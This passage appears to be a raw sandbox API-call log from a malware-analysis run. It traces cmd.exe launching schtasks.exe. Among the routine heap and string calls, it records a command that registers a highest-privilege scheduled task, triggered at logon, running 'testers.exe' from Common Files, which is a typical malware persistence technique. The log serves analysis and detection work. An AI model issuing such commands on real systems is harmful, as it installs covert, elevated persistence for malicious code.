_String2="COLOR") returned 16 [0073.404] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0073.404] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0073.404] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0073.404] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0073.404] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0073.404] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0073.404] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0073.404] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0073.404] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0073.404] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0073.404] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0073.404] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0073.404] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0073.404] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0073.404] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0073.404] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0073.404] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0073.404] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0073.404] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0073.405] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0073.405] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0073.405] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0073.405] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0073.405] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0073.405] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0073.405] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0073.405] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0073.405] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0073.405] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0073.405] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0073.405] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0073.405] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0073.405] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0073.405] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0073.405] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0073.405] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0073.405] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0073.405] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0073.405] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0073.405] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0073.405] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0073.405] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0073.405] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0073.405] _wcsicmp (_String1="schtasks", _String2="FOR") returned 13 [0073.405] _wcsicmp (_String1="schtasks", _String2="IF") returned 10 [0073.405] _wcsicmp (_String1="schtasks", _String2="REM") returned 1 [0073.406] GetProcessHeap () returned 0x620000 [0073.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x210) returned 0x632fb8 [0073.406] GetProcessHeap () returned 0x620000 [0073.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xc4) returned 0x6331d0 [0073.406] _wcsnicmp (_String1="scht", _String2="cmd ", _MaxCount=0x4) returned 16 [0073.406] GetProcessHeap () returned 0x620000 [0073.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x418) returned 0x6332a0 [0073.406] SetErrorMode (uMode=0x0) returned 0x0 [0073.406] SetErrorMode (uMode=0x1) returned 0x0 [0073.406] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6332a8, lpFilePart=0x39f598 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x39f598*="Desktop") returned 0x25 [0073.406] SetErrorMode (uMode=0x0) returned 0x1 [0073.406] GetProcessHeap () returned 0x620000 [0073.406] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6332a0, Size=0x66) returned 0x6332a0 [0073.406] GetProcessHeap () returned 0x620000 [0073.407] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6332a0) returned 0x66 [0073.407] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a6b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0073.407] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0073.407] GetProcessHeap () returned 0x620000 [0073.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x120) returned 0x633310 [0073.407] GetProcessHeap () returned 0x620000 [0073.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x238) returned 0x633438 [0073.413] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x633438, Size=0x122) returned 0x633438 [0073.414] GetProcessHeap () returned 0x620000 [0073.414] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x633438) returned 0x122 [0073.414] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0073.414] GetProcessHeap () returned 0x620000 [0073.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xe0) returned 0x633568 [0073.414] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x633568, Size=0x76) returned 0x633568 [0073.414] GetProcessHeap () returned 0x620000 [0073.414] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x633568) returned 0x76 [0073.415] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0073.415] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x39f314, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x39f314) returned 0xffffffff [0073.415] GetLastError () returned 0x2 [0073.415] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\schtasks", fInfoLevelId=0x1, lpFindFileData=0x39f314, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x39f314) returned 0xffffffff [0073.415] GetLastError () returned 0x2 [0073.415] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0073.415] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x39f314, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x39f314) returned 0x6335e8 [0073.416] GetProcessHeap () returned 0x620000 [0073.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x631838 [0073.416] FindClose (in: hFindFile=0x6335e8 | out: hFindFile=0x6335e8) returned 1 [0073.416] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.COM", fInfoLevelId=0x1, lpFindFileData=0x39f314, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x39f314) returned 0xffffffff [0073.416] GetLastError () returned 0x2 [0073.416] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.EXE", fInfoLevelId=0x1, lpFindFileData=0x39f314, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x39f314) returned 0x6335e8 [0073.416] GetProcessHeap () returned 0x620000 [0073.416] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x631838, Size=0x4) returned 0x631838 [0073.416] FindClose (in: hFindFile=0x6335e8 | out: hFindFile=0x6335e8) returned 1 [0073.416] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0073.416] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0073.416] GetConsoleTitleW (in: lpConsoleTitle=0x39f80c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0073.417] InitializeProcThreadAttributeList (in: lpAttributeList=0x39f694, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x39f75c | out: lpAttributeList=0x39f694, lpSize=0x39f75c) returned 1 [0073.417] UpdateProcThreadAttribute (in: lpAttributeList=0x39f694, dwFlags=0x0, Attribute=0x60001, lpValue=0x39f754, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x39f694, lpPreviousValue=0x0) returned 1 [0073.417] GetStartupInfoW (in: lpStartupInfo=0x39f650 | out: lpStartupInfo=0x39f650*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0073.417] lstrcmpW (lpString1="\\schtasks.exe", lpString2="\\XCOPY.EXE") returned -1 [0073.418] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\schtasks.exe", lpCommandLine="schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x39f6f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x39f73c | out: lpCommandLine="schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessInformation=0x39f73c*(hProcess=0x78, hThread=0x74, dwProcessId=0x85c, dwThreadId=0x86c)) returned 1 [0073.449] CloseHandle (hObject=0x74) returned 1 [0073.449] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0073.449] GetProcessHeap () returned 0x620000 [0073.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x634d38 | out: hHeap=0x620000) returned 1 [0073.449] GetEnvironmentStringsW () returned 0x634358* [0073.450] GetProcessHeap () returned 0x620000 [0073.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xb46) returned 0x637888 [0073.450] FreeEnvironmentStringsW (penv=0x634358) returned 1 [0073.450] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0075.008] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x39f630 | out: lpExitCode=0x39f630*=0x0) returned 1 [0075.008] CloseHandle (hObject=0x78) returned 1 [0075.008] _vsnwprintf (in: _Buffer=0x39f778, _BufferCount=0x13, _Format="%08X", _ArgList=0x39f63c | out: _Buffer="00000000") returned 8 [0075.008] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0075.008] GetProcessHeap () returned 0x620000 [0075.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x637888 | out: hHeap=0x620000) returned 1 [0075.009] GetEnvironmentStringsW () returned 0x637888* [0075.009] GetProcessHeap () returned 0x620000 [0075.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xb6c) returned 0x638400 [0075.009] FreeEnvironmentStringsW (penv=0x637888) returned 1 [0075.009] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0075.009] GetProcessHeap () returned 0x620000 [0075.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638400 | out: hHeap=0x620000) returned 1 [0075.009] GetEnvironmentStringsW () returned 0x637888* [0075.009] GetProcessHeap () returned 0x620000 [0075.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xb6c) returned 0x638400 [0075.009] FreeEnvironmentStringsW (penv=0x637888) returned 1 [0075.009] GetProcessHeap () returned 0x620000 [0075.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62fff8 | out: hHeap=0x620000) returned 1 [0075.009] DeleteProcThreadAttributeList (in: lpAttributeList=0x39f694 | out: lpAttributeList=0x39f694) [0075.009] _get_osfhandle (_FileHandle=1) returned 0x7 [0075.009] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0075.009] _get_osfhandle (_FileHandle=1) returned 0x7 [0075.009] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a6a41ac | out: lpMode=0x4a6a41ac) returned 1 [0075.010] _get_osfhandle (_FileHandle=0) returned 0x3 [0075.010] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a6a41b0 | out: lpMode=0x4a6a41b0) returned 1 [0075.010] SetConsoleInputExeNameW () returned 0x1 [0075.010] GetConsoleOutputCP () returned 0x1b5 [0075.010] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6a4260 | out: lpCPInfo=0x4a6a4260) returned 1 [0075.010] SetThreadUILanguage (LangId=0x0) returned 0x409 [0075.010] exit (_Code=0) Process: id = "6" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x283e6000" os_pid = "0x85c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x704" cmd_line = "schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 15 os_tid = 0x86c [0073.997] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbf94c | out: lpSystemTimeAsFileTime=0xbf94c*(dwLowDateTime=0xc90a8780, dwHighDateTime=0x1d661bd)) [0073.997] GetCurrentProcessId () returned 0x85c [0073.997] GetCurrentThreadId () returned 0x86c [0073.997] GetTickCount () returned 0x11495ea [0073.998] RtlQueryPerformanceCounter () returned 0x1 [0073.999] GetModuleHandleA (lpModuleName=0x0) returned 0x50000 [0073.999] __set_app_type (_Type=0x1) [0073.999] __p__fmode () returned 0x770331f4 [0073.999] __p__commode () returned 0x770331fc [0073.999] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x67881) returned 0x0 [0074.001] __wgetmainargs (in: _Argc=0x79e6c, _Argv=0x79e74, _Env=0x79e70, _DoWildCard=0, _StartInfo=0x79e80 | out: _Argc=0x79e6c, _Argv=0x79e74, _Env=0x79e70) returned 0 [0074.002] _onexit (_Func=0x70fe2) returned 0x70fe2 [0074.002] _onexit (_Func=0x70ff3) returned 0x70ff3 [0074.002] _onexit (_Func=0x71002) returned 0x71002 [0074.002] _onexit (_Func=0x7101e) returned 0x7101e [0074.002] _onexit (_Func=0x7103a) returned 0x7103a [0074.002] _onexit (_Func=0x71056) returned 0x71056 [0074.003] _onexit (_Func=0x71072) returned 0x71072 [0074.003] _onexit (_Func=0x7108e) returned 0x7108e [0074.003] _onexit (_Func=0x710aa) returned 0x710aa [0074.003] _onexit (_Func=0x710c6) returned 0x710c6 [0074.003] _onexit (_Func=0x710e2) returned 0x710e2 [0074.003] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0074.003] WinSqmIsOptedIn () returned 0x0 [0074.004] GetProcessHeap () returned 0x2c0000 [0074.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4c48 [0074.004] SetLastError (dwErrCode=0x0) [0074.004] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0074.004] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0074.004] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0074.004] VerifyVersionInfoW (in: lpVersionInformation=0xbf3c4, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0xbf3c4) returned 1 [0074.004] GetProcessHeap () returned 0x2c0000 [0074.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4c60 [0074.004] lstrlenW (lpString="") returned 0 [0074.004] GetProcessHeap () returned 0x2c0000 [0074.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x2) returned 0x2d5030 [0074.004] GetProcessHeap () returned 0x2c0000 [0074.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5040 [0074.004] GetProcessHeap () returned 0x2c0000 [0074.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4c78 [0074.004] GetProcessHeap () returned 0x2c0000 [0074.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5060 [0074.004] GetProcessHeap () returned 0x2c0000 [0074.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5080 [0074.004] GetProcessHeap () returned 0x2c0000 [0074.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d50a0 [0074.004] GetProcessHeap () returned 0x2c0000 [0074.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d50c0 [0074.004] GetProcessHeap () returned 0x2c0000 [0074.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4c90 [0074.005] GetProcessHeap () returned 0x2c0000 [0074.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d50e0 [0074.005] GetProcessHeap () returned 0x2c0000 [0074.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5100 [0074.005] GetProcessHeap () returned 0x2c0000 [0074.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5120 [0074.005] GetProcessHeap () returned 0x2c0000 [0074.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5140 [0074.005] GetProcessHeap () returned 0x2c0000 [0074.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4ca8 [0074.005] GetProcessHeap () returned 0x2c0000 [0074.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5160 [0074.005] GetProcessHeap () returned 0x2c0000 [0074.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5198 [0074.005] GetProcessHeap () returned 0x2c0000 [0074.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d51b8 [0074.005] GetProcessHeap () returned 0x2c0000 [0074.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d51d8 [0074.005] SetThreadUILanguage (LangId=0x0) returned 0x409 [0074.006] SetLastError (dwErrCode=0x0) [0074.006] GetProcessHeap () returned 0x2c0000 [0074.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d51f8 [0074.006] GetProcessHeap () returned 0x2c0000 [0074.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5218 [0074.006] GetProcessHeap () returned 0x2c0000 [0074.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5238 [0074.006] GetProcessHeap () returned 0x2c0000 [0074.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5258 [0074.006] GetProcessHeap () returned 0x2c0000 [0074.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5278 [0074.006] GetProcessHeap () returned 0x2c0000 [0074.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4cc0 [0074.006] _memicmp (_Buf1=0x2d4cc0, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.006] GetProcessHeap () returned 0x2c0000 [0074.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x208) returned 0x2d5b00 [0074.006] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2d5b00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0074.006] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x755b0000 [0074.008] GetProcAddress (hModule=0x755b0000, lpProcName="GetFileVersionInfoSizeW") returned 0x755b19d9 [0074.008] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0074.008] GetProcessHeap () returned 0x2c0000 [0074.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x74e) returned 0x2d5d10 [0074.009] GetProcAddress (hModule=0x755b0000, lpProcName="GetFileVersionInfoW") returned 0x755b19f4 [0074.009] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x2d5d10 | out: lpData=0x2d5d10) returned 1 [0074.009] GetProcAddress (hModule=0x755b0000, lpProcName="VerQueryValueW") returned 0x755b1b51 [0074.009] VerQueryValueW (in: pBlock=0x2d5d10, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xbf4cc, puLen=0xbf4d0 | out: lplpBuffer=0xbf4cc*=0x2d60ac, puLen=0xbf4d0) returned 1 [0074.010] _memicmp (_Buf1=0x2d4cc0, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.010] _vsnwprintf (in: _Buffer=0x2d5b00, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xbf4b4 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0074.010] VerQueryValueW (in: pBlock=0x2d5d10, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xbf4dc, puLen=0xbf4d8 | out: lplpBuffer=0xbf4dc*=0x2d5ed8, puLen=0xbf4d8) returned 1 [0074.010] lstrlenW (lpString="schtasks.exe") returned 12 [0074.011] lstrlenW (lpString="schtasks.exe") returned 12 [0074.011] lstrlenW (lpString=".EXE") returned 4 [0074.011] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0074.011] lstrlenW (lpString="schtasks.exe") returned 12 [0074.011] lstrlenW (lpString=".EXE") returned 4 [0074.011] _memicmp (_Buf1=0x2d4cc0, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.011] lstrlenW (lpString="schtasks") returned 8 [0074.012] GetProcessHeap () returned 0x2c0000 [0074.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d52b8 [0074.012] GetProcessHeap () returned 0x2c0000 [0074.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d52d8 [0074.012] GetProcessHeap () returned 0x2c0000 [0074.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d52f8 [0074.012] GetProcessHeap () returned 0x2c0000 [0074.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5318 [0074.012] GetProcessHeap () returned 0x2c0000 [0074.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4d20 [0074.012] _memicmp (_Buf1=0x2d4d20, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.012] GetProcessHeap () returned 0x2c0000 [0074.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0xa0) returned 0x2d66f0 [0074.012] GetProcessHeap () returned 0x2c0000 [0074.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5338 [0074.012] GetProcessHeap () returned 0x2c0000 [0074.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5358 [0074.012] GetProcessHeap () returned 0x2c0000 [0074.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5378 [0074.012] GetProcessHeap () returned 0x2c0000 [0074.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4d38 [0074.012] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.012] GetProcessHeap () returned 0x2c0000 [0074.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x200) returned 0x2d6798 [0074.012] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0074.013] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0074.013] GetProcessHeap () returned 0x2c0000 [0074.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x30) returned 0x2d69a0 [0074.013] _vsnwprintf (in: _Buffer=0x2d66f0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xbf4b8 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0074.013] GetProcessHeap () returned 0x2c0000 [0074.013] GetProcessHeap () returned 0x2c0000 [0074.013] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5d10) returned 1 [0074.013] GetProcessHeap () returned 0x2c0000 [0074.013] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5d10) returned 0x74e [0074.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5d10 | out: hHeap=0x2c0000) returned 1 [0074.013] SetLastError (dwErrCode=0x0) [0074.013] GetThreadLocale () returned 0x409 [0074.013] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.013] lstrlenW (lpString="?") returned 1 [0074.013] GetThreadLocale () returned 0x409 [0074.013] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.013] lstrlenW (lpString="create") returned 6 [0074.013] GetThreadLocale () returned 0x409 [0074.013] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.013] lstrlenW (lpString="delete") returned 6 [0074.013] GetThreadLocale () returned 0x409 [0074.013] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.013] lstrlenW (lpString="query") returned 5 [0074.014] GetThreadLocale () returned 0x409 [0074.014] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.023] lstrlenW (lpString="change") returned 6 [0074.023] GetThreadLocale () returned 0x409 [0074.023] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.023] lstrlenW (lpString="run") returned 3 [0074.023] GetThreadLocale () returned 0x409 [0074.023] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.023] lstrlenW (lpString="end") returned 3 [0074.023] 